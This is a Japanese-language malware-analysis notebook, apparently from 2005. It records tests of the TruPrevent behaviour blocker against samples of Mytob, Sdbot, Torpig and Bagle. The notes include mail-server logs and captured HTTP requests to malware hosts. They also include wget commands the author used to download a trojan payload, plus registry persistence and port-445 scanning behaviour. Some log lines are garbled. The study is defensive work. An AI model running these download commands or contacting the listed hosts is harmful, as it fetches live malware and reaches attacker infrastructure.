Mytob-BF の mass mailing を TruPrevent が prevent している log: Aug 26 20:16:51 tnasti-bsd postfix/smtpd[6827]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:51 tnasti-bsd postfix/smtpd[6827]: lost connection after CONNECT from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:51 tnasti-bsd postfix/smtpd[6827]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:51 tnasti-bsd postfix/smtpd[6827]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:51 tnasti-bsd postfix/smtpd[6827]: B884977CE2: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6831]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6832]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6831]: 9BBB677CE3: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6832]: B9E6777CE4: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6827]: lost connection after DATA from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6827]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6831]: lost connection after DATA from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6832]: lost connection after DATA from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6831]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:16:52 tnasti-bsd postfix/smtpd[6832]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Mytob-BF の mass mailing を TruPrevent が prevent している log part 2: Aug 26 20:30:25 tnasti-bsd postfix/smtpd[6847]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1].ac.jp[192.168.0.1] Aug 26 20:30:25 tnasti-bsd postfix/smtpd[6847]: lost connection after CONNECT from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:25 tnasti-bsd postfix/smtpd[6847]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1].jp[192.168.0.1] Aug 26 20:30:25 tnasti-bsd postfix/smtpd[6847]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1].ac.jp[192.168.0.1] Aug 26 20:30:26 tnasti-bsd postfix/smtpd[6850]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1].1] Aug 26 20:30:27 tnasti-bsd postfix/smtpd[6851]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1].1] Aug 26 20:30:27 tnasti-bsd postfix/smtpd[6847]: 2E0BF77CE2: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:27 tnasti-bsd postfix/smtpd[6850]: 776D877CE3: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:27 tnasti-bsd postfix/smtpd[6851]: 9F9E477CE4: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:29 tnasti-bsd postfix/smtpd[6856]: connect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:29 tnasti-bsd postfix/smtpd[6851]: lost connection after DATA from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:29 tnasti-bsd postfix/smtpd[6851]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:29 tnasti-bsd postfix/smtpd[6856]: 6448377CE4: client=tnasti060.st.ryukoku.ac.jp[192.168.0.1] Aug 26 20:30:30 tnasti-bsd postfix/smtpd[6856]: lost connection after RCPT from tnasti060.st.ryukoku.ac.jp[192.168.0.1]ku.ac.jp> Aug 26 20:30:30 tnasti-bsd postfix/smtpd[6856]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1]sti-bsd.st.ryukoku.ac.jp> Aug 26 20:30:32 tnasti-bsd postfix/cleanup[6854]: 776D877CE3: message-id=<20050826113026.776D877CE3@tnasti-bsd.st.ryukoku.ac.jp> Aug 26 20:30:32 tnasti-bsd postfix/cleanup[6853]: 2E0BF77CE2: message-id=<20050826113026.2E0BF77CE2@tnasti-bsd.st.ryukoku.ac.jp> Aug 26 20:30:32 tnasti-bsd postfix/smtpd[6850]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1]queue active) Aug 26 20:30:32 tnasti-bsd postfix/smtpd[6847]: disconnect from tnasti060.st.ryukoku.ac.jp[192.168.0.1]087, nrcpt=1 (queue active) Aug 26 20:30:32 tnasti-bsd postfix/qmgr[204]: 2E0BF77CE2: from=, size=74655, nrcpt=1 (queue active)o.net.om>, relayAug 26 20:30:32 tnasti-bsd postfix/qmgr[204]: 776D877CE3: from=, size=73087, nrcpt=1 (queue active) Aug 26 20:30:32 tnasti-bsd postfix/local[6858]: 2E0BF77CE2: to=, orig_to=, relay=local, delay=6, status=sent (delivered to mailbox)D877CE3: to=, orig_to=, orig_to=, relay=local, delay=7, status=sent (delivered to mailbox) Aug 26 20:30:33 tnasti-bsd postfix/qmgr[204]: 776D877CE3: removed Mytob-BF は最初、port 4512 に接続しようとしている (IRC?)。これをうまく扱えれば、もっとうまく検出できるのかも知れない。 Sdbot-ABW --------- port 12000 に接続しようとしている (IRC?)。 12000 に ircd を置いてみると、 26-Aug-2005 21:23:21.201 queries: XX+/192.168.0.1/dc21.dc21business.com/A/IN local 0 remote 0 s bfbff4dc bad auth reply in [ : USERID : UNIX : eazy2-358089 : USERID : UNIX : e# ] Troj/Torpid-G / Trojan.Downloader.Small-673 (zam.exe) ----------------------------------------------------- zam.exe を起動したが、TruPrevent は発動しない。 +VC3p1YVTEjcAABGVfzQAAAAH|GET /ftp/file.exe HTTP/1.1|User-Agent:Mozilla/5.0|Host:zaminbank.net -VC3p1YVTEjcAABGVfzQAAAAH なので wget http://zaminbank.net/ftp/file.exe すると…… get できる (!) Troj/Torpig-B / Trojan.Spy.Agent.EZ だそうだ。 これを copy し、直接実行してみる。すると、 +Y0--loVTEjcAABFyHCwAAAAB|GET /c1.txt HTTP/1.1|User-Agent:Mozilla/5.0|Host:zajahost.net -Y0--loVTEjcAABFyHCwAAAAB +ZIzZDoVTEjcAABFxFgoAAAAA|POST /log.php HTTP/1.1|Referer:http%3a//nowhere.com/ident.php|Accept:*/*|Content-Type:application/x-www-form-urlencoded|Accept-Language:en|Accept-Encoding:gzip, deflateConnection%3a Keep-Alive|User-Agent:Rescue/9.11|Host:zajahost.net|Content-Length:556|Connection:Keep-Alive|Cache-Control:no-cache -ZIzZDoVTEjcAABFxFgoAAAAA +ZIzbBYVTEjcAABGUeVsAAAAG|GET /down.php?id=fifamhel&iso=JPN HTTP/1.1|User-Agent:Mozilla/5.0|Host:zajahost.net -ZIzbBYVTEjcAABGUeVsAAAAG さらに get しようとしている模様。wget http://zajahost.net/c1.txt してみると、これは空。 wget 'http://zajahost.net/down.php?id=fifamhel&iso=JPN' してみると、
Warning: main(conf.txt): failed to open stream: No such file or directory in /home/zaja/public_html/down.php on line 25

Warning: main(): Failed opening 'conf.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/zaja/public_html/down.php on line 25

Warning: fopen(conf.txt): failed to open stream: Permission denied in /home/zaja/public_html/down.php on line 32

Warning: fputs(): supplied argument is not a valid stream resource in /home/zaja/public_html/down.php on line 33

Warning: fclose(): supplied argument is not a valid stream resource in /home/zaja/public_html/down.php on line 34
結局 TruPrevent は起動せず。 BagleDl-S / Worm.Bagle.BB-gen (Taxes.exe) ----------------------------------------- HKCU / Run と HKLM / Run に C:\WINNT\system32\winshost.exe を埋め込む。 hosts の改変……というか、localhost だけにしているのでクリアと言うべきか。 winshost.exe を実行してみるが……なにもはっせいしない。 W32/Mytob-EF (Mytob.ck.pif) --------------------------- HKLM / Run に C:\WINNT\services.exe を埋め込む。 hosts の改変。 サブネット内のホストの 445/tcp に接続しようとする。 いくつかのホスト (220.164.140.199 など) に接続しようとする。 そこで 192.168.0.2 に標的を置いてみる。administrator パスワードを administrator に変更。 でもやっぱり反応しない。